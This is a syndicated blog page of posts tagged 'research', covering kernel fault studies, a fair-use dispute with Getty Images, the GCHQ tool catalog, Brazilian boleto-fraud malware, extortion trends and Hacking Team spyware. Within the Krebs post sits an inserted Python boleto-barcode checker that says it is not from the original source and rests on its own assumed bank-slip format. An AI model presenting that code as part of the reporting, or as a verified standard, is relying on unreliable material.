Posts tagged ‘research’

LWN.net: Faults in Linux 2.6

This post was syndicated from: LWN.net and was written by: jake. Original post: at LWN.net

Six researchers (including Julia Lawall of the Coccinelle project) have just released a paper [PDF] (abstract) that looks at the faults in the 2.6 kernel. “In August 2011, Linux entered its third decade. Ten years before, Chou et al. published a study of faults found by applying a static analyzer to Linux versions 1.0 through 2.4.1. A major result of their work was that the drivers directory contained up to 7 times more of certain kinds of faults than other directories. This result inspired numerous efforts on improving the reliability of driver code. Today, Linux is used in a wider range of environments, provides a wider range of services, and has adopted a new development and release model. What has been the impact of these changes on code quality? To answer this question, we have transported Chou et al.’s experiments to all versions of Linux 2.6, released between 2003 and 2011. We find that Linux has more than doubled in size during this period, but the number of faults per line of code has been decreasing. Moreover, the fault rate of drivers is now below that of other directories, such as arch. These results can guide further development and research efforts for the decade to come. To allow updating these results as Linux evolves, we define our experimental protocol and make our checkers available.”
(Thanks to Asger Alstrup Palm.)

LWN.net: [$] Genealogy research with Gramps

This post was syndicated from: LWN.net and was written by: n8willis. Original post: at LWN.net

Genealogy is a fairly popular pursuit, and those wishing to use open-source software in their hobby have their choice cut out for them—Gramps is the only complete, actively-developed free-software solution. The project was started in 2001 and initially known as GRAMPS; the first stable release was in 2004. The latest, version 4.1.0 (“Name go in book”) was released on June 18.

Schneier on Security: Security Against Traffic Analysis of Cloud Data Access

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Here’s some interesting research on foiling traffic analysis of cloud storage systems.

Press release.

The Hacker Factor Blog: Dear Getty Images Legal Department

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

For the last few years, Getty Images has operated an aggressive anti-copyright infringement campaign. In 2011, they purchased PicScout to search the Internet for potential unlicensed uses of their pictures. Then they began sending out very scary-sounding takedown notices. These letters include a “cease and desist” paragraph as well as a bill for the unauthorized use.

I just received one of these letters. Here’s the 7-page (3.4 MB) letter: PDF. (The only thing I censored was the online access code for paying online.) They billed me $475 for a picture used on my blog. (If you log into their site, it’s $488 with tax.)

A number of news outlets as well as the blogosphere have begun reporting on these letters from Getty Images. For example:

  • International Business Times: “Getty Images Lawsuits: Enforcement Or Trolling? Fear Of Letters Dwindling, Stock-Photo Giant Hits Federal Courts”
  • The DG Group: “Image Copyright Infringement And Getty Images Scam Letter”
  • Extortion Letter Info: “Reporting on Getty Images & Stock Photo Settlement Demand Letters (Copyright Trolls, ‘Extortion’ Letters, ‘Shadown’ Letters)”
  • Women in Business: “Are You Being Set Up For Copyright Infringement? As Technology Becomes More Invasive Copyright Infringement Scams Flourish”
  • RyanHealy.com: “Getty Images Extortion Letter”
  • someguy72 @ Reddit: He states that he purchased the pictures legally from Getty and still received an infringement notice. His advice: if you purchase a picture from Getty, “save your records FOREVER… they will come after you, years later and you might not have PROOF of PURCHASE, and then you will be screwed.”

As far as I can tell, this is an extortion racket. (I’m surprised that there hasn’t been a class-action lawsuit against Getty Images yet.) The basic premise is that they send out a threatening letter with a price tag. Some people will fear the strongly-worded letter and simply pay the amount. If you ignore it, then they send more letters with greater dollar amounts. If you call them up, the forums say that you can usually negotiate a lower amount. However, sometimes you may not actually owe anything at all.

Many people have reported that, if you just ignore it, then it goes away. However, Getty Images has sued a few people who ignored the letters. If you ignore it, then you place yourself at risk.

But here’s the thing… There are some situations where you can use the image without a license. It is in the Copyright law under the heading “Fair Use” (US Copyright Law Title 17 Section 107; in some countries, it’s called “Fair Dealing”). This is an exception from copyright enforcement. Basically, if you’re using the picture as art on your web site or to promote a product, then you are violating their copyright. (You should negotiate a lower rate.) However, if you use it for criticism, comment, news reporting, teaching, scholarship, or research, then you are allowed to use the picture.

For example, I have many blog entries where I forensically evaluate pictures. I do this to show techniques, criticize content, identify deceptive practices, etc. If Fair Use did not exist, then I would be unable to criticize or expose deception from media outlets. In effect, they would be censoring my freedom of speech by preventing me from directly addressing the subject.

Reply To Getty

The picture in question is one that is on an older blog entry: In The Flesh. This blog entry criticizes the media outlets Time and Salon for promoting misleading and hostile software. (It’s hostile because the demo software installs malware.) The software, False Flesh, claims to make people in any picture appear nude. The pictures in my blog entry are used to demonstrate some of the deceptive practices. Specifically, the pictures of nude women on the software’s web site did not come from their software.

I looked at the picture mentioned in Getty’s complaint and how it was being used in the blog entry. I really thought it was permitted under Copyright Fair Use. However, I’m not an attorney. So… I checked with an attorney about the Getty complaint and my use of the picture. I was actually surprised that he didn’t start his answer with “that depends…” (If you’ve ever worked with an attorney, then you know any discussion about legality begins with them saying “that depends…”) Instead, he said outright “it’s clearly fair use.”

Personally, I’m offended that Getty Images made no attempt to look at the context in which the picture is used.

Rather than ignoring them, I sent them a letter:

Dr. Neal Krawetz
Hacker Factor
PO Box 270033
Fort Collins, CO
80527-0033

July 15, 2014

Legal Department
Getty Images
605 5th Ave S, Suite 400
Seattle, WA
98104

Dear Getty Images Legal Department,

I received your copyright infringement notification dated “7/10/2014 11:05:06 AM”, case number 371842247, on July 14, 2014. I have reviewed the image, the use of the picture on my web site, and discussed this situation with an attorney. It is my strong belief that I am clearly using the picture within the scope of Copyright Fair Use (Title 17 Section 107).

Specifically:

  • The blog entry, titled “In The Flesh”, criticizes the media outlets Time and Salon for promoting deceptive software. The software is called “False Flesh” and claims to turn any photo of a person into a nude. I point out that installing the False Flesh demo software will install malware.
  • The blog entry discloses research findings regarding the False Flesh software: there is no identified owner for the software and the sample pictures they use to demonstrate their software are not from their software. I specifically traced their sample images to pictures from sites such as Getty Images. I forensically evaluate the pictures and explicitly point out the misrepresentation created by these images on the False Flesh web site.
  • The picture is used on my web site to criticize the media reports by exposing fraud and misrepresentation associated with the product. It is also included as part of a demonstration for tracking and identifying potentially fraudulent products in general.
  • The blog entry reports on these findings to the public in order to educate people regarding the deceptive nature of False Flesh and the risks from using this software.
  • The image that you identified is not used in the blog entry to promote any products or services and is directly related to the comments, criticism, and research covered in the blog entry. The use is not commercial in nature. This goes toward the purpose and character, which is to identify fraud and misrepresentation in a product promoted by Time and Salon.
  • As described in the blog entry, I found sample images on the False Flesh web site and used TinEye and other forensic methods to identify the sources. This was used to prove that the False Flesh software did not generate any of their sample images.
  • I did not use the full-size version of this particular picture and it includes the Getty Images Image Bank watermark. The blog entry explicitly identifies that the source for the False Flesh picture was Getty Images and not False Flesh. I point out that False Flesh used the picture in a deceptive manner.
  • I believe that my use of this picture has no adverse effect on the potential market for the image.

I believe that this covers the Copyright Fair Use requirements for criticism, comment, teaching, research, and reporting.

Getty Images acknowledges Fair Use in their FAQ concerning license requirements:
http://company.gettyimages.com/license-compliance/faq/#are-there-limitations-on-a-copyright-owners-rights

Specifically, Getty Images calls out education and research. As a computer security and forensic researcher, I use this blog to describe tools and techniques, evaluate methodologies, and to identify deceptive practices. I believe that this specific blog entry, and my blog in general, clearly fit both of these areas.

As stated in this letter, the picture’s appearance on my blog is Fair Use and I have the right under copyright law to use the image without your consent. This letter serves as notice that any DMCA takedown or blocking notices to any third party would be in bad faith.

Sincerely,

/s/ Dr. Neal Krawetz

Chilling Effect

My blog in general reports on findings related to computer security and forensics. Many of these blog entries heavily focus on scams, fraud, and abuse from media outlets. Many of my blog entries (reports) have been repeated by news outlets, and some of my blog entries have had a direct effect on changing insecure and unethical practices. This includes a series of blog entries that exposed digital manipulation in World Press Photo’s annual contest (influencing changes in this year’s contest rules) and a paper on fundamental problems with credit card payment systems that led to changes in the Visa security standards.

While this could be a widespread extortion racket, it could also be Getty’s way of testing the waters before going after some blog entries where I openly and explicitly criticize them for releasing digitally altered photos.

My primary concern is the chilling effect this could have. If I pay the extortion, then it opens me for more claims from Getty; I have previously criticized them for providing digitally altered photos and performed analysis to prove it. It also opens the way for similar claims from the Associated Press, Reuters, and every other media outlet that I have openly criticized. All of my blog entries that explicitly expose digital misrepresentation, report on media manipulation, and even those that disclose methods for evaluating content will be at risk.

In effect, bowing to this one threatening letter would force me to close my blog since I would no longer be allowed to freely write — report, comment, disclose research, and educate others — on topics related to media manipulation and digital photo analysis. I consider Getty’s attempt to censor my blog’s content to be an unacceptable attack on my freedom of speech.

LWN.net: Google’s “Project Zero”

This post was syndicated from: LWN.net and was written by: corbet. Original post: at LWN.net

Google’s newly announced Project Zero is focused on making the net as a whole safer from attackers. “We’re not placing any particular bounds on this project and will work to improve the security of any software depended upon by large numbers of people, paying careful attention to the techniques, targets and motivations of attackers. We’ll use standard approaches such as locating and reporting large numbers of vulnerabilities. In addition, we’ll be conducting new research into mitigations, exploitation, program analysis—and anything else that our researchers decide is a worthwhile investment.” Their policy of only reporting bugs to the vendor looks like it could result in the burying of inconvenient vulnerabilities, but presumably they have thought about that.

TorrentFreak: File-Sharing Doesn’t Hurt Box Office Revenue, Research Finds

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

Research into online piracy comes in all shapes and sizes, often with equally mixed results. Often the main question is whether piracy is hurting sales.

A new study conducted by economist Koleman Strumpf is one of the most comprehensive on the subject so far.

Drawing on data from a popular BitTorrent tracker and revenue projections from the Hollywood Stock Exchange he researches how the release of a pirated movie affects expected box office income.

The research covers 150 of the most popular films that were released over a period of seven years, and the findings reveal that the release of pirated films on file-sharing sites doesn’t directly hurt box office revenue.

“There is no evidence in my empirical results of file-sharing having a significant impact on theatrical revenue,” Strumpf tells TorrentFreak in a comment.

“My best guess estimate is that file sharing reduced the first month box office by $200 million over 2003-2009, which is only three tenths of a percent of what movies actually earned. I am unable to reject the hypothesis that there is no impact at all of file-sharing on revenues.”

So while there is a small negative effect, it is limited to three tenths of a percent and is not statistically significant.

Interestingly, the data also reveals that movie leaks shortly before the premiere have a small positive impact on expected revenues. This suggests that file-sharing may serve as a form of promotion.

“One consistent result is that file-sharing arrivals shortly before the theatrical opening have a modest positive effect on box office revenue. One explanation is that such releases create greater awareness of the film. This is also the period of heaviest advertising,” Strumpf notes.

One of the advantages of this study compared to previous research is that it measures the direct effect of a movie leak on projected box office revenues. Previous studies mostly compared early versus late leaks, which is less accurate and may be influenced by other factors.

“For example, suppose studios added extra security to big budget movies which then have a delayed arrival to file-sharing networks. Then even if file-sharing has no impact at all, one would find that delayed arrival on file-sharing leads to higher revenues,” Strumpf tells us.

Another upside of the research lies in the statistical precision. The data includes thousands of daily observations and relatively precise estimates, something lacking in most previous studies.

The downside, on the other hand, is that the expected box office impact is estimated from the Hollywood Stock Exchange. While this has been shown to be a good predictor of actual revenues, it’s not a direct measurement.

In any case, the paper suggests that file-sharing might not be the biggest threat the movie industry is facing.

Even if the negative effects were twice as big as the data suggests, it would still be less than the $500 million Hollywood spent on the MPAA’s anti-piracy efforts during the same period.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Schneier on Security: GCHQ Catalog of Exploit Tools

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

The latest Snowden story is a catalog of exploit tools from JTRIG (Joint Threat Research Intelligence Group), a unit of the British GCHQ, for both surveillance and propaganda. It’s a list of code names and short descriptions, such as these:

GLASSBACK: Technique of getting a target’s IP address by pretending to be a spammer and ringing them. Target does not need to answer.

MINIATURE HERO: Active skype capability. Provision of real time call records (SkypeOut and SkypetoSkype) and bidirectional instant messaging. Also contact lists.

MOUTH: Tool for collection for downloading a user’s files from Archive.org.

PHOTON TORPEDO: A technique to actively grab the IP address of MSN messenger user.

SILVER SPECTOR: Allows batch Nmap scanning over Tor.

SPRING BISHOP: Find private photographs of targets on Facebook.

ANGRY PIRATE: is a tool that will permanently disable a target’s account on their computer.

BUMPERCAR+: is an automated system developed by JTRIG CITD to support JTRIG BUMPERCAR operations. BUMPERCAR operations are used to disrupt and deny Internet-based terror videos or other materials. The technique employs the services provided by upload providers to report offensive materials.

BOMB BAY: is the capacity to increase website hits/rankings.

BURLESQUE: is the capacity to send spoofed SMS messages.

CLEAN SWEEP: Masquerade Facebook Wall Posts for individuals or entire countries.

CONCRETE DONKEY: is the capacity to scatter an audio message to a large number of telephones, or repeatedly bomb a target number with the same message.

GATEWAY: Ability to artificially increase traffic to a website.

GESTATOR: amplification of a given message, normally video, on popular multimedia websites (Youtube).

SCRAPHEAP CHALLENGE: Perfect spoofing of emails from Blackberry targets.

SUNBLOCK: Ability to deny functionality to send/receive email or view material online.

SWAMP DONKEY: is a tool that will silently locate all predefined types of file and encrypt them on a target’s machine.

UNDERPASS: Change outcome of online polls (previously known as NUBILO).

WARPATH: Mass delivery of SMS messages to support an Information Operations campaign.

HAVLOCK: Real-time website cloning techniques allowing on-the-fly alterations.

HUSK: Secure one-on-one web based dead-drop messaging platform.

There’s lots more. Go read the rest. This is a big deal, as big as the TAO catalog from December.

I would like to post the entire list. If someone has a clever way of extracting the text, or wants to retype it all, please send it to me.

EDITED TO ADD (7/16): HTML of the entire catalog is here.

Krebs on Security: Brazilian ‘Boleto’ Bandits Bilk Billions

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

With the eyes of the world trained on Brazil for the 2014 FIFA World Cup, it seems a fitting time to spotlight a growing form of computer fraud that’s giving Brazilian banks and consumers a run for their money. Today’s post looks at new research into a mostly small-time cybercrime practice that in the aggregate appears to have netted thieves the equivalent of billions of dollars over the past two years.

A boleto.

At issue is the “boleto” (officially “Boleto Bancario”), a popular payment method in Brazil that is used by consumers and for most business-to-business payments. Brazilians can use boletos to complete online purchases via their bank’s Web site, but unlike credit card payments — which can be disputed and reversed — payments made via boletos are not subject to chargebacks and can only be reverted by bank transfer.

Brazil has an extremely active and talented cybercrime underground, and increasingly Brazilian organized crime gangs are setting their sights on boleto users who bank online. This is typically done through malware that lies in wait until the user of the hacked PC visits their bank’s site and fills out the account information for the recipient of a boleto transaction. In this scenario, the unwitting victim submits the transfer for payment and the malware modifies the request by substituting a recipient account that the attackers control.

Many of the hijacked boleto transactions are low-dollar amounts, but in the aggregate these purloined payments can generate an impressive income stream for even a small malware gang. On Tuesday, for example, a source forwarded me a link to a Web-based control panel for a boleto-thieving botnet (see screenshot below); in this operation, we can see that the thieves had hijacked some 383 boleto transactions between February 2014 and the end of June, but had stolen the equivalent of nearly USD $250,000 during that time.

The records kept by a boleto-stealing botnet. Next to the date and time is the account of the intended recipient of the transfer; the “linha alterada” column shows the accounts used by the thieves to accept diverted payments. “Valor” refers to the amount, expressed in Brazilian Real.

But a recent discovery by researchers at RSA, the security division of EMC, exposes far more lucrative and ambitious boleto banditry. RSA says the fraud ring it is tracking — known as the “Bolware” operation — affects more than 30 different banks in Brazil, and may be responsible for up to $3.75 billion USD in losses. RSA arrived at this estimate based on the discovery of a similar botnet control panel that tracked nearly a half-million fraudulent transactions.

Most Brazilian banks require online banking customers to install a security plug-in that hooks into the user’s browser. The plug-ins are designed to help block malware attacks. But according to RSA, the Bolware gang’s malware successfully disables those security plug-ins, leaving customers with a false sense of security when banking online.

The malware also harvests usernames and passwords from victim PCs, credentials that are thought to be leveraged in spreading the malware via spam to the victim’s contacts. RSA said this fraud gang appears to have infected more than 192,000 PCs, and stolen at least 83,000 sets of user credentials.

Administration screen of the Bolware gang shows the original Boleto numbers “Bola Original” and their destination bank “Bola”. Image: RSA

RSA notes that the miscreants responsible for the Bolware operation appear to have used just over 8,000 separate accounts to receive the stolen funds. That’s roughly 7,997 more accounts than were used by the boleto bandits responsible for the diverted transactions in the boleto botnet control panel I discovered.

Researchers at RSA suggest that Brazilians who wish to transact in boletos online should consider using a mobile device to manage their boleto transactions, noting that boleto-thieving malware currently is not capable of altering the data stored in the barcode of each hijacked boleto order — at least for the time being.

“As the malware does not alter the barcode (for now), the safest approach is to use mobile banking applications available on smart phones (for now, immune to this malware) to read the barcode and to make payments,” the company said in its report (PDF) on this crime wave.
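As an added example (not code from the Krebs post or from RSA’s report), here is the consistency check a banking app could run on the barcode RSA describes as unaltered: it rebuilds the barcode from the linha digitável the browser submitted and reports the fields on which the two disagree, so a swapped bank or beneficiary field is caught before payment. It assumes the commonly documented Febraban boleto layout and check-digit rules (an assumption, not taken from the page), and every number in it is constructed for the demo.

```python
"""Consistency check between the barcode printed on a boleto and the
'linha digitavel' a browser submits for payment.

Added example, not code from the Krebs post or from RSA. It assumes the
Febraban boleto layout as commonly documented (an assumption, not from
the page):
  barcode (44 digits): bank[0:3] currency[3] DV[4] due-factor[5:9]
                       value[9:19] free-field[19:44]
  linha digitavel (47 digits): field1 = bank+currency+free[0:5]+mod10
                               field2 = free[5:15]+mod10
                               field3 = free[15:25]+mod10
                               field4 = general DV, field5 = due-factor+value
Every sample number below is constructed for the demo.
"""
from __future__ import annotations


def mod10(digits: str) -> int:
    """Mod-10 check digit: weights 2,1,2,1,... from the right, digit-sum of products."""
    total, weight = 0, 2
    for ch in reversed(digits):
        prod = int(ch) * weight
        total += prod if prod < 10 else prod - 9  # same as adding the two digits
        weight = 1 if weight == 2 else 2
    return (10 - total % 10) % 10


def mod11(digits: str) -> int:
    """Mod-11 general check digit: weights 2..9 cycling from the right."""
    total, weight = 0, 2
    for ch in reversed(digits):
        total += int(ch) * weight
        weight = 2 if weight == 9 else weight + 1
    dv = 11 - total % 11
    return 1 if dv in (0, 10, 11) else dv


def make_barcode(bank: str, due_factor: int, value_cents: int, free_field: str) -> str:
    """Assemble a 44-digit barcode, computing its general check digit."""
    body = f"{bank:0>3}9{due_factor:04d}{value_cents:010d}{free_field}"
    if len(body) != 43 or not body.isdigit():
        raise ValueError("bad barcode components")
    return body[:4] + str(mod11(body)) + body[4:]


def barcode_to_linha(barcode: str) -> str:
    """Derive the 47-digit linha digitavel from a 44-digit barcode."""
    if len(barcode) != 44 or not barcode.isdigit():
        raise ValueError("barcode must be 44 digits")
    f1 = barcode[0:4] + barcode[19:24]
    f2 = barcode[24:34]
    f3 = barcode[34:44]
    return (f1 + str(mod10(f1)) + f2 + str(mod10(f2)) + f3 + str(mod10(f3))
            + barcode[4] + barcode[5:19])


def linha_to_barcode(linha: str) -> str:
    """Rebuild the barcode from a linha digitavel, verifying all four check digits."""
    digits = "".join(ch for ch in linha if ch.isdigit())
    if len(digits) != 47:
        raise ValueError("linha digitavel must contain 47 digits")
    f1, f2, f3 = digits[0:10], digits[10:21], digits[21:32]
    dv, f5 = digits[32], digits[33:47]
    for field in (f1, f2, f3):
        if mod10(field[:-1]) != int(field[-1]):
            raise ValueError("field check digit mismatch")
    body = f1[0:4] + f5 + f1[4:9] + f2[:-1] + f3[:-1]  # barcode without its DV
    if mod11(body) != int(dv):
        raise ValueError("general check digit mismatch")
    return body[:4] + dv + body[4:]


FIELDS = {"bank": (0, 3), "due_factor": (5, 9), "value": (9, 19), "free_field": (19, 44)}


def check_submission(printed_barcode: str, submitted_linha: str) -> list[str]:
    """Names of barcode fields on which the submitted line disagrees with the
    printed barcode; ['checksum'] if the line is not even internally valid.
    An empty list means the submission matches the barcode the customer scanned."""
    try:
        rebuilt = linha_to_barcode(submitted_linha)
    except ValueError:
        return ["checksum"]
    return [name for name, (a, b) in FIELDS.items()
            if printed_barcode[a:b] != rebuilt[a:b]]


if __name__ == "__main__":
    # Constructed boleto: bank 341, due-date factor 6011, R$ 123.45, dummy free field.
    printed = make_barcode("341", 6011, 12345, "1234567890123456789012345")
    legit = barcode_to_linha(printed)
    # Constructed "linha alterada": same amount and due date, but a different
    # bank and free field (the beneficiary data), as a recipient swap produces.
    altered = barcode_to_linha(make_barcode("237", 6011, 12345, "9876543210987654321098765"))
    print(check_submission(printed, legit))    # []
    print(check_submission(printed, altered))  # ['bank', 'free_field']
```

Because the amount and due date are left untouched by the swap, a check that only compares the value field would pass; the bank and free-field comparison is what exposes the diverted recipient.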

Schneier on Security: How Traffic Shaping Can Help the NSA Evade Legal Oversight

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

New research paper on how the NSA can evade legal prohibitions against collecting Internet data and metadata on Americans by forcing domestic traffic to leave and return to the US. The general technique is called “traffic shaping,” and has legitimate uses in network management.

From a news article:

The Obama administration previously said there had been Congressional and Judicial oversight of these surveillance laws — notably Section 215 of the Patriot Act, which authorized the collection of Americans’ phone records; and Section 702 of the Foreign Intelligence Surveillance Act (FISA), which authorized the controversial PRISM program to access non-U.S. residents’ emails, social networking, and cloud-stored data.

But the researchers behind this new study say that the lesser-known Executive Order (EO) 12333, which remains solely the domain of the Executive Branch — along with United States Signals Intelligence Directive (USSID) 18, designed to regulate the collection of American’s data from surveillance conducted on foreign soil — can be used as a legal basis for vast and near-unrestricted domestic surveillance on Americans.

The legal provisions offered under EO 12333, which the researchers say “explicitly allows for intentional targeting of U.S. persons” for surveillance purposes when FISA protections do not apply, was the basis of the authority that reportedly allowed the NSA to tap into the fiber cables that connected Google and Yahoo’s overseas to U.S. data centers.

An estimated 180 million user records, regardless of citizenship, were collected from Google and Yahoo data centers each month, according to the leaked documents. The program, known as Operation MUSCULAR, was authorized because the collection was carried out overseas and not on U.S. soil, the researchers say.

The paper also said surveillance can be carried out across the wider Internet by routing network traffic overseas so it no longer falls within the protection of the Fourth Amendment.

We saw a clumsy example of this in 2013, when a bunch of Internet traffic was mysteriously routed through Iceland. That one was the result of hacking the Border Gateway Protocol (BGP). I assure you that the NSA’s techniques are more effective and less obvious.

Krebs on Security: 2014: The Year Extortion Went Mainstream

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

The year 2014 may well go down in the history books as the year that extortion attacks went mainstream. Fueled largely by the emergence of the anonymous online currency Bitcoin, these shakedowns are blurring the lines between online and offline fraud, and giving novice computer users a crash course in modern-day cybercrime.

An extortion letter sent to 900 Degrees Neapolitan Pizzeria in New Hampshire.

An extortion letter sent to 900 Degrees Neapolitan Pizzeria in New Hampshire.

At least four businesses recently reported receiving “Notice of Extortion” letters in the U.S. mail. The letters say the recipient has been targeted for extortion, and threaten a range of negative publicity, vandalism and harassment unless the target agrees to pay a “tribute price” of one bitcoin (currently ~USD $561) by a specified date. According to the letter, that tribute price increases to 3 bitcoins (~$1,683) if the demand isn’t paid on time.

The ransom letters, which appear to be custom written for restaurant owners, threaten businesses with negative online reviews, complaints to the Better Business Bureau, harassing telephone calls, telephone denial-of-service attacks, bomb threats, fraudulent delivery orders, vandalism, and even reports of mercury contamination.

The missive encourages recipients to sign up with Coinbase – a popular bitcoin exchange – and to send the funds to a unique bitcoin wallet specified in the letter and embedded in the QR code that is also printed on the letter.

Interestingly, all three letters I could find that were posted online so far targeted pizza stores. At least two of them were mailed from Orlando, Florida.

The letters all say the amounts are due either on Aug. 1 or Aug. 15. Perhaps one reason the deadlines are so far off is that the attackers understand that not everyone has bitcoins, or even knows about the virtual currency.

“What the heck is a BitCoin?” wrote the proprietors of New Hampshire-based 900 Degrees Neapolitan Pizzeria, which posted a copy of the letter (above) on their Facebook page.

Sandra Alhilo, general manager of Pizza Pirates in Pomona, Calif., received the extortion demand on June 16.

“At first, I was laughing because I thought it had to be a joke,” Alhilo said in a phone interview. “It was funny until I went and posted it on our Facebook page, and then people put it on Reddit and the Internet got me all paranoid.”

Nicholas Weaver, a researcher at the International Computer Science Institute (ICSI) and at the University California, Berkeley, said these extortion attempts cost virtually nothing and promise a handsome payoff for the perpetrators.

“From the fraudster’s perspective, the cost of these attacks is a stamp and an envelope,” Weaver said. “This type of attack could be fairly effective. Some businesses — particularly restaurant establishments — are very concerned about negative publicity and reviews. Bad Yelp reviews, tip-offs to the health inspector… that stuff works and isn’t hard to do.”

While some restaurants may be an easy mark for this sort of crime, Weaver said the extortionists in this case are tangling with a tough adversary — The U.S. Postal Service — which takes extortion crimes perpetrated through the U.S. mail very seriously.

“There is a lot of operational security that these guys might have failed at, because this is interstate commerce, mail fraud, and postal inspector territory, where the gloves come off,” Weaver said. “I’m willing to bet there are several tools available to law enforcement here that these extortionists didn’t consider.”

It’s not entirely clear if or why extortionists seem to be picking on pizza establishments, but it’s probably worth noting that the grand-daddy of all pizza joints – Domino’s Pizza in France — recently found itself the target of a pricey extortion attack earlier this month after hackers threatened to release the stolen details on more than 650,000 customers if the company failed to pay a ransom of approximately $40,000.

Meanwhile, Pizza Pirates’s Alhilo says the company has been working with the local U.S. Postal Inspector’s office, which was very interested in the letter. Alhilo said her establishment won’t be paying the extortionists.

“We have no intention of paying it,” she said. “Honestly, if it hadn’t been a slow day that Monday I might have just thrown the letter out because it looked like junk mail. It’s annoying that someone would try to make a few bucks like this on the backs of small businesses.”

A GREAT CRIME FOR CRIMINALS

Fueled largely by the relative anonymity of cryptocurrencies like Bitcoin, extortion attacks are increasingly being incorporated into all manner of cyberattacks today. Today’s thieves are no longer content merely to hijack your computer and bandwidth and steal all of your personal and financial data; increasingly, these crooks are likely to hold all of your important documents for ransom as well.

“In the early days, they’d steal your credit card data and then threaten to disclose it only after they’d already sold it on the underground,” said Alan Paller, director of research at the SANS Institute, a Bethesda, Md. based security training firm. “But today, extortion is the fastest way for the bad guys to make money, because it’s the shortest path from cybercrime to cash. It’s really a great crime for the criminals.”

Last month, the U.S. government joined private security companies and international law enforcement partners to dismantle a criminal infrastructure responsible for spreading Cryptolocker, a ransomware scourge that the FBI estimates stole more than $27 million from victims compromised by the file-encrypting malware.

Even as the ink was still drying on the press releases about the Cryptolocker takedown, a new variant of Cryptolocker — Cryptowall — was taking hold. These attacks encrypt the victim PC’s hard drive unless and until the victim pays an arbitrary amount specified by the perpetrators — usually a few hundred dollars worth of bitcoins. Many victims without adequate backups in place (or those whose backups also were encrypted) pay up. Others, like the police department in the New Hampshire hamlet of Durham, are standing their ground.

The downside to standing your ground is that — unless you have backups of your data — the encrypted information is gone forever. When these attacks hit businesses, the results can be devastating. Code-hosting and project management services provider CodeSpaces.com was forced to shut down this month after a hacker gained access to its Amazon EC2 account and deleted most data, including backups. According to Computerworld, the devastating security breach happened over a span of 12 hours and initially started with a distributed denial-of-service attack followed by an attempt to extort money from the company.

A HIDDEN CRIME

Extortion attacks against companies operating in the technology and online space are nothing new, of course. Just last week, news came to light that mobile phone giant Nokia in 2007 paid millions to extortionists who threatened to reveal an encryption key to Nokia’s Symbian mobile phone source code.

Trouble is, the very nature of these scams makes it difficult to gauge their frequency or success.

“The problem with extortion is that the money is paid in order to keep the attack secret, and so if the attack is successful, there is no knowledge of the attack even having taken place,” SANS’s Paller said.

Traditionally, the hardest part about extortion has been getting paid and getting away with the loot. In the case of the crooks who extorted Nokia, the company paid the money, reportedly leaving the cash in a bag at an amusement park car lot. Police were tracking the drop-off location, but ultimately lost track of the blackmailers.

Anonymous virtual currencies like Bitcoin not only make it easier for extortionists to get paid, but they also make it easier and more lucrative for more American blackmailers to get in on the action. Prior to Bitcoin’s rise in popularity, the principal way that attackers extracted their ransom was by instructing victims to pay by wire transfer or reloadable prepaid debit cards — principally Greendot cards sold at retailers, convenience stores and pharmacies.

But unlike Bitcoin payments, these methods of cashing out are easily traceable if the cash-out happens within the United States, the ICSI’s Weaver said.

“Bitcoin is their best available tool if they’re located in the United States,” Weaver said of extortionists. “Western Union can be traced at U.S. cashout locations, as can Greendot payments. Which means you either need an overseas partner [who takes half of the profit for his trouble] or Bitcoin.”

Schneier on Security: More on Hacking Team’s Government Spying Software

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Hacking Team is an Italian malware company that sells exploit tools to governments. Both Kaspersky Lab and Citizen Lab have published detailed reports on its capabilities against Android, iOS, Windows Mobile, and BlackBerry smart phones.

They allow, for example, for covert collection of emails, text messages, call history and address books, and they can be used to log keystrokes and obtain search history data. They can take screenshots, record audio from the phones to monitor calls or ambient conversations, hijack the phone’s camera to snap pictures or piggyback on the phone’s GPS system to monitor the user’s location. The Android version can also enable the phone’s Wi-Fi function to siphon data from the phone wirelessly instead of using the cell network to transmit it. The latter would incur data charges and raise the phone owner’s suspicion.

[...]

Once on a system, the iPhone module uses advanced techniques to avoid draining the phone’s battery, turning on the phone’s microphone, for example, only under certain conditions.

“They can just turn on the mic and record everything going on around the victim, but the battery life is limited, and the victim can notice something is wrong with the iPhone, so they use special triggers,” says Costin Raiu, head of Kaspersky’s Global Research and Analysis team.

One of those triggers might be when the victim’s phone connects to a specific WiFi network, such as a work network, signaling the owner is in an important environment. “I can’t remember having seen such advanced techniques in other mobile malware,” he says.

Hacking Team’s mobile tools also have a “crisis” module that kicks in when they sense the presence of certain detection activities occurring on a device, such as packet sniffing, and then pause the spyware’s activity to avoid detection. There is also a “wipe” function to erase the tool from infected systems.

Hacking Team claims to sell its tools only to ethical governments, but Citizen Lab has found evidence of their use in Saudi Arabia. It can’t be certain the Saudi government is a customer, but there’s good circumstantial evidence. In general, circumstantial evidence is all we have. Citizen Lab has found Hacking Team servers in many countries, but it’s a perfectly reasonable strategy for Country A to locate its servers in Country B.

And remember, this is just one example of government spyware. Assume that the NSA — as well as the governments of China, Russia, and a handful of other countries — have their own systems that are at least as powerful.

TorrentFreak: Dotcom’s Internet Party Wants to Abolish “Geo Blocking” Restrictions

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

Last January, exactly two years after the Megaupload raid, Kim Dotcom entered New Zealand’s political arena with the launch of his Internet Party.

The party is currently preparing for the general election in September. While Dotcom will not be on the voting ballot himself, he remains one of the main influencers of the party’s policy.

As the name suggests, many of the party’s core issues revolve around the Internet, copyright included. Today the Internet Party released a draft of its copyright policy with several suggestions for an overhaul of current legislation.

One of the key issues the Internet Party wants to change is the liability New Zealanders face for using VPN services and other circumvention tools to access legal content. At the moment, it is illegal for them to stream content from U.S.-based Hulu and Netflix via proxies or VPNs.

TorrentFreak spoke with Kim Dotcom who notes that consumers shouldn’t be punished for the inability of Hollywood to release its content globally. Dotcom hopes that these changes will eventually put a stop to the unnecessary release delays.

